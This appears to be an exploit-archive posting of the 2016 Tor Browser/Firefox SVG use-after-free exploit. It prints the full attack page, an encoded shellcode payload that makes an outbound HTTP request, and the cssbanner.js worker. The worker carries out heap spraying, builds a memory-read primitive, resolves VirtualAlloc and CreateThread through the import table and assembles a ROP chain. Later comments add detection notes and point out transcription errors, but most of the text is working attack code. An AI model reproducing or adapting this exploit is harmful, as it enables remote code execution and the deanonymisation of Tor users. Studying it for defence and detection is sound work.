
Tor Browser / Firefox Remote use-after-free FBI Exploit

🗓️ 02 Dec 2016 00:00:00 · Reported by firstwatch · Type: zdt

Tor Browser/Firefox Remote use-after-free FBI Exploit is actively being used against Tor Browser; it uses HTML and CSS to reach "VirtualAlloc" in "kernel32.dll". Fix ASAP.

Code
This is a JavaScript exploit actively being used against Tor Browser right now. It
consists of one HTML file and one CSS file, both pasted below and also
de-obfuscated. The exact functionality is unknown, but it obtains access to
"VirtualAlloc" in "kernel32.dll" and proceeds from there. Please fix ASAP. I
had to break the "thecode" line in two in order to post it; remove the ' + ' in
the middle to restore it.

<html>
<head>
<script>

// Payload handed to the worker: a string of \u-escaped 16-bit code units.
// The worker (cssbanner.js, listed further down) pads it to an even length
// and later repacks it two code units per 32-bit word. Treat the literal as
// opaque data; it is reproduced exactly as posted (the author notes the line
// was split with ' + ' to get past a posting limit).
var thecode
='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
+
'\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190';


// Spawn the helper worker from a same-origin script named cssbanner.js and
// hand it the payload. The request for that file name is a useful artifact
// in proxy / web-server logs when hunting for this sample.
var worker = new Worker('cssbanner.js');

worker.postMessage(thecode);

var svgns = 'http://www.w3.org/2000/svg';
// Two pools that exploit() fills with ArrayBuffer copies; each pool is
// populated half before and half after the <animate> attribute changes.
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
// Templates that exploit() copies (slice(0)) into the pools above; the
// 0x80 template is also the one written through a Uint32Array view.
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined; // declared but never read anywhere in this listing
var arrBase = undefined; // set from the worker's first message (see worker.onmessage)

// SVG nodes created in craftDOM and driven later by exploit().
var animateX = undefined;
var containerA = undefined;

// Build-specific constant selected by user-agent sniffing.
// NOTE(review): as transcribed this line is not valid JavaScript — the regex
// literal's '/' delimiters and '\' escapes appear to have been lost in the
// paste, so the script as printed would fail to parse here.
var offset = 0x90;
if (/.*Firefox/(4[7-9]|[5-9]d+|[1-9]d{2,})..*/.test(navigator.userAgent))
{
offset = 0x88; // versions 47.0 or greater
}

// Shorthand lookup of a DOM element by id; defined but not referenced
// anywhere else in this listing.
var $ = function (elementId) {
  var doc = document;
  return doc.getElementById(elementId);
};

// Second stage on the page side, reached only from worker.onmessage once the
// worker has reported arrBase. It writes (arrBase - offset) into three slots
// of the 0x80-byte template, then fills the two pools in four batches around
// two pairs of 'begin' attribute changes on the <animate> element built in
// craftDOM, and finally pauses the animations. The exact order of these
// operations appears to be what the routine depends on; annotate, do not
// reorder. Observations: the loop index `i` is never declared and leaks as
// an implicit global; the first and fourth loops both cover the upper half
// of heap100, so its lower half is never populated.
// Detection note: the literal 'PAUSING!!! YAYA' goes to window.dump(), which
// only emits anywhere when the browser's dump output is enabled, so it will
// rarely surface outside a lab.
var exploit = function()
{
var u32 = new Uint32Array(block80)
u32[0x2] = arrBase - offset;
u32[0x8] = arrBase - offset;
u32[0xE] = arrBase - offset;


for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}

for(i = 0; i < heap80.length/2; i++)
{
heap80[i] = block80.slice(0)
}

// First pair of attribute changes on the <animate> element.
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')

for(i = heap80.length/2; i < heap80.length; i++)
{
heap80[i] = block80.slice(0)
}

for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}

// Second pair of attribute changes, then the SVG timeline is paused.
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
window.dump('PAUSING!!! YAYA');
containerA.pauseAnimations();
}

// Handles the worker's first message, which carries the numeric arrBase
// (the worker calls postMessage(arrBase) before it starts scanning). The
// handler immediately replaces itself so that the worker's second and final
// message ("GREAT SUCCESS") triggers the cleanup below instead.
// Cleanup, one second after that final message: terminate the worker, wipe
// <body> and <head>, and clear the onload attribute — the page removes its
// own code from the live DOM. For incident response, preserve the original
// HTTP response bodies (HTML plus cssbanner.js) rather than a DOM snapshot
// taken after the fact.
worker.onmessage = function(e)
{
// Replacement handler: runs on the worker's next message only.
worker.onmessage = function(e)
{
window.setTimeout(function()
{
worker.terminate();

document.body.innerHTML = '';
document.getElementsByTagName('head')[0].innerHTML = '';
document.body.setAttribute('onload', '')
}, 1000);
}

arrBase = e.data;
exploit();
}


// Produce an element id of the form 'id' followed by exactly four lower-case
// hex digits (e.g. 'id3f9a'). Math.random() is the only source of variation,
// so ids are merely unlikely to collide, not guaranteed unique.
var idGenerator = function()
{
// (1 + r) * 0x10000 is always in [0x10000, 0x20000), so its hex form has
// five digits beginning with '1'; dropping that leading digit leaves four.
var scaled = (1 + Math.random()) * 0x10000;
var hex = (scaled | 0).toString(16);
return 'id' + hex.slice(1);
}


// Builds the SVG structure the page-side stage acts on: two <svg>
// containers and four <animate> children with random ids. animateB and
// animateC are chained to other elements' end times through '<id>.end'
// values, animateA has a fixed end and animateX (the one exploit() later
// re-targets) has no timing attributes at all. containerA and animateX are
// stored in module-level variables for exploit().
// Detection note: a page whose only substantive content is a handful of
// <animate> elements with cross-referencing 'begin'/'end' attributes, plus
// a Worker, is a reasonable hunting signature for this sample.
var craftDOM = function()
{
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');

animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')

var animateC = document.createElementNS(svgns, 'animate')

var idX = idGenerator();
var idA = idGenerator();
var idB = idGenerator();
var idC = idGenerator();

animateX.setAttribute('id', idX);
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('id', idB);
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('begin', '10s');
animateC.setAttribute('end', idA + '.end');

// animateC lives in the second container, apart from the element it refers to.
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)

containerB.appendChild(animateC)

document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
// Entry point: the DOM is crafted on load; everything after that is driven
// by the worker's messages (see worker.onmessage).
window.onload = craftDOM;
//
</script>

<style>
/* Positions the only visible content on the page — the <div id='mtdiv'>
   holding mt.png — centred near the top. Cosmetic only; nothing in the
   scripts reads or touches this element. */
#mtdiv{
position: absolute;
width: 960px;
height: 166px;
z-index: 15;
top: 100px;
left: 50%;
margin: 0 0 0 -480px;
}
</style>
</head>
<body bgcolor='#2F3236'>

<div id='mtdiv'>
<img src='mt.png'/>
</div>
</body>
<script>
// Navigates away to member.php two seconds after the page loads, regardless
// of what the worker reports; that second request is another log artifact.
// The string form of setTimeout is evaluated as code, and as transcribed the
// nested quotes are not escaped, so this line would not parse unmodified.
setTimeout('window.location = 'member.php';', 2000);
</script>

</html>

===================================================================================================

content of "cssbanner.js":

// Worker script (cssbanner.js) as posted, in its minified form. The line
// wrapping here comes from the paste, not the original file, and splits some
// tokens in ways that would not parse (e.g. a `return` separated from its
// value, a string literal broken across lines). A readable copy of the same
// code follows under "Beautified:".
self.onmessage = function(msg) {

thecode = msg.data;
var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
& 65535) + String.fromCharCode(a) };
function
Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;this._abs_read=function(a){a>=this._base_addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return
0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return
this.read(a)&255};this.readWord=function(a){return
this.read(a)&65535};this.readDword=function(a){return this.read(a)};
this.read=function(a,b){if(a%4){var
c=this._abs_read(a&4294967292),d=this._abs_read(a+4&4294967292),e=a%4;return
c>>>8*e|d<<8*(4-e)}return
this._abs_read(a)};this.readStr=function(a){for(var
b="",c=0;;){if(32==c)return"";var
d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return
b};this.write=function(a){}}
function PE(b,a){this.mem=b;this.export_table=this.module_base=void
0;this.export_table_size=0;this.import_table=void
0;this.import_table_size=0;this.find_module_base=function(a){for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return
this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){peFile=this.module_base+this.mem.readWord(this.module_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad
NT
Signature";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=
this.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void
0==this.import_directory&&this._resolve_pe_structures();for(var
e=this.import_directory,c=e+this.import_directory_size;e<c;){var
d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==
d.toUpperCase()){for(var
c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return
this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return
0};void 0!=a&&this.find_module_base(a)}
function ROP(b,a){this.mem=b;this.pe=new
PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var
b=0;;){for(var
e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else
break;if(e==a.length)return
this.module_base+b;b++}};this.findStackPivot=function(){return
this.findSequence([148,195])};this.findPopRet=function(a){return
this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void
0!=c?c:new ArrayBuffer(4096);
c=new Uint32Array(c);var
d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return
c}}
var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new
Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return
convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return
convu32[a]},sprayArrays=function(){for(var
b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+
o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/
8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+
(o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308);
var spr=Array(400),arrBase=805306416,ropArrBuf=new
ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new
Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u9090");sprayArrays();postMessage(arrBase);
for(memarrayloc=void 0;void
0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset<spr[i].length;offset+=512)if("object"!=typeof
spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+
o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var
mem=new Memory(memarrayloc+48,function(b){return
memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var
rop=new
ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
var backupESP=rop.findSequence([137,1,195]),ropChain=new
Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var
i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071;
ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var
j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT
SUCCESS");

};


Beautified:

// Worker side of the sample (cssbanner.js), readable form. It takes the
// payload string from the page, lays out its own arrays of doubles, waits
// for the page-side stage to take effect, derives a read primitive from the
// result, walks a PE import table to reach kernel32.dll functions, assembles
// the final chain, and reports back to the page twice: a numeric base
// (arrBase) before the wait, then the string "GREAT SUCCESS" at the end.
// Both messages — and the two unbounded busy-wait loops in the body — are
// worth knowing about when reproducing or detecting this in a lab.
self.onmessage =
function(msg) {

// Payload from the page. Assigned without `var`, so it becomes a global of
// the worker scope (several other names below do the same: fzero, peFile,
// memarrayloc, ropPtr, ropBase, CreateThread, i, j, offset).
thecode = msg.data;
// Packs a 32-bit value into two UTF-16 code units (low half first). Defined
// but never called anywhere in this listing.
var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
& 65535) + String.fromCharCode(a) };

// Memory(base, readFn, writeFn): turns a callback that reads relative to
// `base` into absolute-address accessors. Addresses below `base` are
// translated modulo 2^32 (the 4294967295 arithmetic), and negative results
// from the callback are normalised back to unsigned 32-bit.
function Memory(b,a,f)
{
this._base_addr=b;
this._read=a;
this._write=f;
// Absolute 32-bit read: convert `a` to an offset from _base_addr (wrapping
// around 2^32 when `a` is below the base), then fix a negative result.
this._abs_read = function(a) {
a >= this._base_addr ? a = this._read( a - this._base_addr) : (
a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
return 0>a?4294967295+a+1:a

};
// Write counterpart of _abs_read. Nothing in this listing calls it, and the
// public write() below is a no-op, so the writeFn passed in is never used.
this._abs_write = function(a,b) {
a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a
= 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
};
// Narrow views over a 32-bit read.
this.readByte = function(a) {
return this.read(a) & 255

};
this.readWord = function(a) {
return this.read(a) & 65535
};
this.readDword = function(a){ return this.read(a) };
// 32-bit read at any alignment: for unaligned `a`, combine the two aligned
// words that straddle it. The second parameter `b` is unused.
this.read = function(a,b) {
if (a%4) {
var c = this._abs_read( a & 4294967292),
d = this._abs_read( a+4 & 4294967292),
e = a%4;
return c>>>8*e | d<<8*(4-e)
}
return this._abs_read(a)
};
// Reads a NUL-terminated byte string of at most 31 characters; returns ""
// if no terminator appears within 32 bytes. Used for import-table names.
this.readStr = function(a) {
for(var b = "", c = 0;;) {
if (32 == c)
return "";
var d = this.readByte(a+c);
if(0 == d)
break;
b += String.fromCharCode(d);
c++
}
return b

};
// Stub: the public write path is intentionally empty in this sample.
this.write = function(a){}
}
// PE(mem, hint): a minimal PE/COFF walker over a Memory object. Given an
// address inside a loaded module it scans downwards in 64 KiB steps for the
// 'MZ' signature (23117 == 0x5A4D), then reads the NT headers to locate the
// export and import data directories. Only the import directory is consumed
// (by resolve_imported_function); the export fields, optional_header,
// export_table and import_table are set but never read.
function PE(b,a) {
this.mem = b;
this.export_table = this.module_base = void 0;
this.export_table_size = 0;
this.import_table = void 0;
this.import_table_size = 0;
// Round `a` down to 64 KiB and walk backwards until a page starts with 'MZ'.
// Loops until a reaches 0 if none is found, leaving module_base undefined.
this.find_module_base = function(a) {
for(a &= 4294901760; a; ) {
if(23117 == this.mem.readWord(a))
return this.module_base=a;
a -= 65536
}
};
// Follow e_lfanew (offset 60 of the DOS header) to the NT headers and check
// the 'PE\0\0' signature (17744 == 0x4550); then record the export and
// import directory RVAs/sizes as absolute addresses. `peFile` is assigned
// without var and leaks as a global.
this._resolve_pe_structures = function() {
peFile = this.module_base + this.mem.readWord(this.module_base+60);
if(17744 != this.mem.readDword(peFile))
throw"Bad NT Signature";
this.pe_file = peFile;
this.optional_header = this.pe_file+36;
this.export_directory =
this.module_base+this.mem.readDword(this.pe_file+120);
this.export_directory_size = this.mem.readDword(this.pe_file+124);
this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
this.import_directory_size=this.mem.readDword(this.pe_file+132)};
// Case-insensitive lookup of function `b` imported from DLL `a`: iterate the
// 20-byte import descriptors, match the DLL name at descriptor+12, then walk
// the name table (descriptor+0) and the address table (descriptor+16) in
// step and return the address-table entry for the matching name, or 0.
// Only the first descriptor whose DLL name matches is searched.
this.resolve_imported_function=function(a,b){
void 0==this.import_directory&&this._resolve_pe_structures();
for(var
e=this.import_directory,c=e+this.import_directory_size;e<c;){
var
d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
if(a.toUpperCase()==d.toUpperCase()){
for(var c = this.mem.readDword(e) + this.module_base,
e = this.mem.readDword(e+16) +
this.module_base,
d = this.mem.readDword(c),
f = 0 ; 0 !=d ;)
{
if(this.mem.readStr(d+this.module_base+2).toUpperCase()
== b.toUpperCase())
return this.mem.readDword(e+4*f);
f++;
d = this.mem.readDword(c+4*f)
}
break
}
e+=20
}
return 0
};
// A hint address, if given, is resolved to a module base immediately.
void 0!=a && this.find_module_base(a)
}
// ROP(mem, ptr): resolves the module containing `ptr` via PE, then offers a
// byte-pattern search starting 4096 bytes past the module base and a
// routine that fills a 4 KiB Uint32Array with a fixed sequence ending in the
// imported VirtualAlloc address and a terminator word (3435973836 ==
// 0xCCCCCCCC) that the caller later searches for. The byte patterns are
// hard-coded; findPopRet ignores its argument; ropChain's loop index `i`
// is an undeclared global.
function ROP(b,a){
this.mem = b;
this.pe = new PE(b,a);
this.pe._resolve_pe_structures();
this.module_base = this.pe.module_base+4096;
// Linear forward scan for the exact byte sequence `a`, one byte at a time.
// Unbounded: if the pattern never occurs the loop keeps reading forever.
this.findSequence = function(a) {
for(var b=0;;) {
for(var e=0,c=0;c<a.length;c++)
if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)
e++;
else
break;
if(e==a.length)
return this.module_base+b;
b++

}

};
this.findStackPivot=function() {
return this.findSequence([148,195])

};
this.findPopRet=function(a) {
return this.findSequence([88,195])

};
// ropChain(base, offset, count, buffer): fills `buffer` (or a fresh 4 KiB
// one) with two located addresses, `count` repeats of the first at
// offset>>2, then the VirtualAlloc import and its argument words, followed
// by the 0xCCCCCCCC marker. Returns the Uint32Array view.
this.ropChain=function(a,b,e,c) {
c = void 0 != c ? c : new ArrayBuffer(4096);
c = new Uint32Array(c);
var d = this.findStackPivot(),
f = this.findPopRet("EAX"),
g =
this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
c[0]= f+1;
c[1]= f;
c[2]= a+b+4*e+4;
c[3]= d;
for(i=0;i<e;i++)
c[(b>>2)+i] = d;
d =(b+4>>2)+e;
c[d++]=g;
c[d++]=a+(b+4*e+28);
c[d++]=a;
c[d++]=4096;
c[d++]=4096;
c[d++]=64;
c[d++]=3435973836;
return c
}
}
// Shared 8-byte buffer used to reinterpret two uint32 halves as one double
// and back — this is how 32-bit values are stored in plain Arrays of doubles.
var conv=new ArrayBuffer(8),
convf64=new Float64Array(conv),
convu32=new Uint32Array(conv),
// qword2Double(lo, hi): pack two 32-bit halves into one double.
qword2Double=function(b,a) {
convu32[0]=b;
convu32[1]=a;
return convf64[0]
},
// doubleFromFloat(d, which): return 32-bit half `which` (0 = low, 1 = high)
// of double `d`.
doubleFromFloat = function(b,a) {
convf64[0]=b;
return convu32[a]

},
// Build one 262138-element array of doubles: every 512th slot group gets the
// same template — the `memory` Uint32Array as an object at a+1 and a set of
// doubles encoding arrBase + oN offsets — then copy it into all 400 slots of
// `spr`. Uses fzero, arrBase, o1..o11, memory and spr, which are declared
// further down in this function (fzero as an implicit global) and assigned
// before sprayArrays() is called.
sprayArrays=function() {
for(var b=Array(262138),a=0;262138>a;a++)
b[a]=fzero;
for(a=0;a<b.length;a+=512)
b[a+1] = memory,
b[a+21] = qword2Double(0,2),
b[a+14] = qword2Double(arrBase+o1,0),
b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
b[a+(o2+0)/8] = qword2Double(2,0),
b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
b[a+(o3+0)/8] = qword2Double(16,0),
b[a+(o3+24)/8] = qword2Double(2,0),
b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
b[a+(o6+8)/8] = qword2Double(2,0),
b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
b[a+(o7+16)/8] = qword2Double(0,4026531840),
b[a+(o7+32)/8] = qword2Double(0,3220176896),
b[a+(o7+48)/8] = qword2Double(2,0),
b[a+(o7+56)/8] = qword2Double(1,0),
b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
b[a+(o7+168)/8] = qword2Double(0,2),
b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
b[a+(o10+0)/8] = qword2Double(2,0),
b[a+(o10+8)/8] = qword2Double(0,268435456),
b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
b[a+(o11+16)/8] = qword2Double(0,4026531840),
b[a+(o11+32)/8] = qword2Double(0,3220176896),
b[a+(o11+48)/8] = qword2Double(2,0),
b[a+(o11+56)/8] = qword2Double(1,0),
b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
b[a+(o11+168)/8] = qword2Double(0,2);
for(a=0;a<spr.length;a++)
spr[a]=b.slice(0)
}, vtable_offset=300;
// Build-specific constant from user-agent sniffing: Firefox 41.0.x / 42.0
// -> 304, 43 and later -> 308, anything else keeps 300. Version-gated
// constants like this are a common trait of browser exploit kits and a
// useful static signature.
/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
vtable_offset=304 :
/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)
&& (vtable_offset=308);
// Layout constants: the 400 spray slots, the fixed arrBase the layout is
// expected to land at, the oN offsets consumed by sprayArrays, a 4 KiB
// buffer for the chain, and the 16-element `memory` Uint32Array whose
// length change is later used as the signal that the page-side stage has
// taken effect. oRop is declared but never used.
var spr=Array(400),
arrBase=805306416,
ropArrBuf=new ArrayBuffer(4096),
o1=176,
o2=256,
o3=768,
o4=832,
o5=864,
o6=928,
o7=1024,
o8=1280,
o9=1344,
o10=1376,
o11=1536,
oRop=1792,
memory=new Uint32Array(16),
len=memory.length,
arr_index=0,
arr_offset=0;
fzero=qword2Double(0,0);
// Pad the payload to an even number of code units so it packs into whole
// 32-bit words below.
0!=thecode.length%2&&(thecode+="\u9090");
sprayArrays();
// First message to the page, which then runs exploit() with this value.
postMessage(arrBase);
// Busy-wait #1: scan the sprayed arrays for a slot whose a+1 entry is no
// longer typeof "object" — i.e. its contents changed underneath the script
// — read the address it now holds (memarrayloc), remember where it was, and
// rewrite several neighbouring entries in place. Busy-wait #2 then spins
// until `memory` reports a different length. Neither loop has a timeout or
// error path, so the worker pins a CPU core indefinitely if the page-side
// stage fails — a behavioural tell in a sandbox.
for(memarrayloc=void 0;void 0==memarrayloc;)
for(i=0;i<spr.length;i++)
